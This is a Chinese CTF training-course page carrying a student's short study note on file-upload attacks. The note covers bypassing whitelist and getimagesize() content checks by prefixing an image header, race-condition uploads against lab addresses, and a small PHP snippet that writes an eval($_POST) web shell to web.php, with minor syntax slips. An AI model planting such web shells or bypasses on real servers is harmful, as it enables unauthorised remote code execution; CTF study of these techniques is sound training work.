1. 首页
  2. 安全技术
  3. CTF
  4. CTF从入门到提升
  5. CTF从入门到提升
默认教学计划
1839人加入学习
(5人评价)
CTF从入门到提升

入选《爆款好课TOP榜》

价格 ¥ 499.00
音频听课 手机端支持一键听课 (试一试)
该课程属于 网络安全公益-高校篇 请加入后再学习

服务端校验:
后缀名白名单校验:
106.12.37.37:10004

服务端校验:
文件内容头校验:
getimagesize();


绕过方法:

在恶意脚本前加上允许上传文件的头标识

 

竞争上传:

趁代码不注意,赶紧访问!
(在删掉之前访问到就可以了)

106.12.37.37:10005
 

生小崽:
<?php
$file='web.php';
$shell=='<?php eval($_POST["key"])?>';
file_put_contents($file,$shell);
>

 
 
 
插件:noscript
 
 
 
 
[展开全文]
重科_张大鹏 · 2019-03-31 · 文件上传_白名单、内容校验、竞争上传 0

授课教师

awindog_123

课程特色

视频(60)
下载资料(15)

最新学员

学员动态

西格玛卡拉米 开始学习 流量分析之wireshark简...
西格玛卡拉米 加入学习
llmmjj 开始学习 流量分析各类常见例题及思路讲解
llmmjj 完成了 1.CTF.pdf
llmmjj 开始学习 1.CTF.pdf